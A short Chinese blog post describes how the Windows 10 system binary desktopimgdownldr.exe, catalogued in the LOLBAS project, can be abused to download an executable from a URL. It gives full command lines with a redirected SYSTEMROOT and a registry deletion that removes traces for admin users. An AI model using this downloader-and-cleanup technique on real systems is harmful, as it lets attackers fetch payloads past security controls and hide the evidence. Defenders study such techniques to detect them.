前幾天在國外網站看到了一篇文章,用desktopimgdownldr。exe來下載檔案,這個技巧也收錄在了GITHUB裡邊的LOLBAS專案。在這之前,windows自帶的下載命令有certutil和bitsadmin,本頭條都有介紹。
desktopimgdownldr。exe,位於Win10的 system32資料夾中,原本用於設定鎖定螢幕或桌面背景影象的。
普通使用者可以用:
set “SYSTEMROOT=C:\Windows\Temp” && cmd /c desktopimgdownldr。exe /lockscreenurl:http://url/xxx。exe /eventName:desktopimgdownldr
這樣來載檔案。
你可以把c:\windows\temp來改成一個普通使用者可寫的目錄。
下載的檔案存放於:
C:\Windows\Temp\Personalization\LockScreenImage\x_%random%。exe。
管理員使用者會多寫一個登錄檔項,所以管理員最好的命令是:
set “SYSTEMROOT=C:\Windows\Temp” && cmd /c desktopimgdownldr。exe /lockscreenurl:https://url/file。exe /eventName:desktopimgdownldr && reg delete HKEY_LOCAL_MACHINE\SOFTWARE\Microsoft\Windows\CurrentVersion\PersonalizationCSP /f
我做過了測試,在win10 1909下做的,結果下載目錄Personalization\LockScreenImage是建成功了,但沒有下載到檔案,並且當前的cmd視窗執行此條命令後變得不可上網。
應當這條命令沒有什麼大問題,可能是我電腦設定問題,大家可以自行測試一下。
